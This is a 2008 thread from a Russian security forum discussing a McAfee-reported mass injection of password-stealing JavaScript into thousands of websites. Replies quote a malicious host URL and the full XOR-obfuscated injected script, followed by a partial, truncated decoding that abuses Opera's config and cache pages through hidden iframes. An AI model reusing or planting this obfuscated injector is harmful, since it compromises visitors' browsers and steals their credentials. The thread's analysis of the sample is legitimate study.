ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Хакеры инфицировали тысячи веб-страниц |
19.03.2008, 12:32
|
|
Участник форума
Регистрация: 15.02.2007
Сообщений: 133
Провел на форуме:
370092
Репутация:
52
|
|
Хакеры инфицировали тысячи веб-страниц
Хакеры, которые занимаются кражей паролей, используемых в популярных online играх, уже заразили более 10,000 веб-страниц за последних несколько дней. веб-атака, которая была совершена с китайских серверов, была впервые замечена исследователями McAfee в среду утром. На протяжении нескольких часов компания по безопасности проследила больше чем 10,000 зараженных веб-страниц на сотнях веб-сайтов.
McAfee пока не уверенна, как такое большое количество сайтов было взломано, но "некоторые из этих атак произошли настолько быстро, что это действительно похоже на некоторую автоматизацию", - сказал Крэйг Шмагар (Craig Schmugar) исследователь с McAfee's Avert Labs. В прошлом, нападавшие использовали поисковые движки, чтобы искать в интернете уязвимые веб-сайты, а после этого они писали автоматические утилиты, которые совершали нападения, позволяя в конечном счете преступникам использовать легальные сайты для запуска своего вредоносного кода.
Инфицированные сайты ничем не отличаются от неинфицированных, но хакеры добавили небольшой код JavaScript, который перенаправляет браузеры посетителей под невидимую атаку, осуществляемую с китайских серверов. Та же самая техника нападения была использована год назад, когда хакеры инфицировали сайты Miami Dolphins и Dolphins Stadium как раз перед футбольной игрой 2007 Super Bowl XLI.
Если выполнение кода произошло успешно, на компьютере жертвы устанавливается программа, которая крадет пароли от известных сетевых игр, включая таких, как Lord of the Rings.
|
|
|
19.03.2008, 12:42
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159
Репутация:
950
|
|
У них сплоит оч хороший  Вчера нарвался на их фрейм. |
|
|
|
19.03.2008, 12:51
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
>> У них сплоит оч хороший Вчера нарвался на их фрейм.
Дай ссылку на сайт протрояненный
|
|
|
|
19.03.2008, 13:13
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
McAfee это средний род. А не женский.
Давай-ка фрейм сюда. И как ты узнал, что это китайцы?
не доработка ==> пишетсявместе.
|
|
|
|
19.03.2008, 15:17
|
|
Участник форума
Регистрация: 15.09.2005
Сообщений: 115
Провел на форуме:
495113
Репутация:
48
|
|
_http://webm0nster.cn/banners/index.php вот помойму это ссылка на _http://forum.worldofwarcraft.ru висят 3 фрейма кстати атака происходит когда только для уников которые сидят под IE =)
|
|
|
|
19.03.2008, 15:51
|
|
Познавший АНТИЧАТ
Регистрация: 26.03.2007
Сообщений: 1,095
Провел на форуме:
5265510
Репутация:
455
|
|
Вот код
<script language=JavaScript>str = "cm`oj^hgs`ld!<!enbtldou/bsd`udDmdldou)&hgs`ld&(:cm`oj^hgs`ld/rsb!<!&`cntu;cm`oj&:cm`oj^hgs`ld/rdu@uushctud)&he&-!&cm`oj^hgs`ld^vhoenv&(:cm`oj^hgs`ld/rdu@uushctud)&ruxmd&-!&ehrqm`x;onod&(:enbtldou/`qqdoeBihme)cm`oj^hgs`ld(:cm`oj^hgs`ld^vhoenv/dw`m!)#bnoghf^hgs`ld!<!enbtldou/bsd`udDmdldou)&hgs`ld&(:]bnoghf^hgs`ld/rdu@uushctud)&he&-!&bnoghf^hgs`ld^vhoenv&(:]bnoghf^hgs`ld/rsb!<!&nqds`;bnoghf&:]enbtldou/`qqdoeBihme)bnoghf^hgs`ld(:]`qq^hgs`ld!<!enbtldou/bsd`udDmdldou)&rbshqu&(:]b`bid^hgs`ld!<!enbtldou/bsd`udDmdldou)&hgs`ld&(:]`qq^hgs`ld/rsb!<!&&:]`qq^hgs`ld/nomn`e!<!gtobuhno!)(]z]b`bid^hgs`ld/rsb!<!&nqds`;b`bid&:]b`bid^hgs`ld/nomn`e!<!gtobuhno!)(]z]b`bid!<!b`bid^hgs`ld/bnoudouEnbtldou/bihmeOnedrZ1\/hoodsIULM/unTqqdsB`rd)(:]w`s!sd!<!odv!SdfDyq)&)NQS]]vz4|/DYD(]]r+]]e*]]r+";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script>
|
|
|
|
19.03.2008, 17:17
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715
Репутация:
659
|
|
В разкодированном виде этот фуфел имеет следующий вид:
Код:
blank_iframe = document.createElement('iframe');
blank_iframe.src = 'about:blank';
blank_iframe.setAttribute('id', 'blank_iframe_window');
blank_iframe.setAttribute('style', 'display:none');
document.appendChild(blank_iframe);
blank_iframe_window.eval("config_iframe = document.createElement('iframe');\config_iframe.setAttribute('id', 'config_iframe_window');\config_iframe.src = 'opera:config';\document.appendChild(config_iframe);\app_iframe = document.createElement('script');\cache_iframe = document.createElement('iframe');\app_iframe.src = '';\app_iframe.onload = function ()\{\cache_iframe.src = 'opera:cache';\cache_iframe.onload = function ()\{\cache = cache_iframe.contentDocument.childNodes[0.innerHTML.toUpperCase();\var re = new RegExp('(OPR\\w{5}.EXE)\\s*\\d+\\s*
|
|
|
|
19.03.2008, 17:41
|
|
Познавший АНТИЧАТ
Регистрация: 26.03.2007
Сообщений: 1,095
Провел на форуме:
5265510
Репутация:
455
|
|
уников которые сидят под Ie =)
Которые под оперой сидят.....
(я под оперой зашол......
капец моим поролям =)
|
|
|
|
19.03.2008, 18:57
|
|
Участник форума
Регистрация: 15.02.2007
Сообщений: 133
Провел на форуме:
370092
Репутация:
52
|
|
походу ппц)
|
|
|
|
19.03.2008, 19:07
|
|
Постоянный
Регистрация: 31.08.2007
Сообщений: 571
Провел на форуме:
1847821
Репутация:
953
|
|
js отключите и все )
китайцы впереди планеты все ))) синь-синь-хуааа супа хака
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
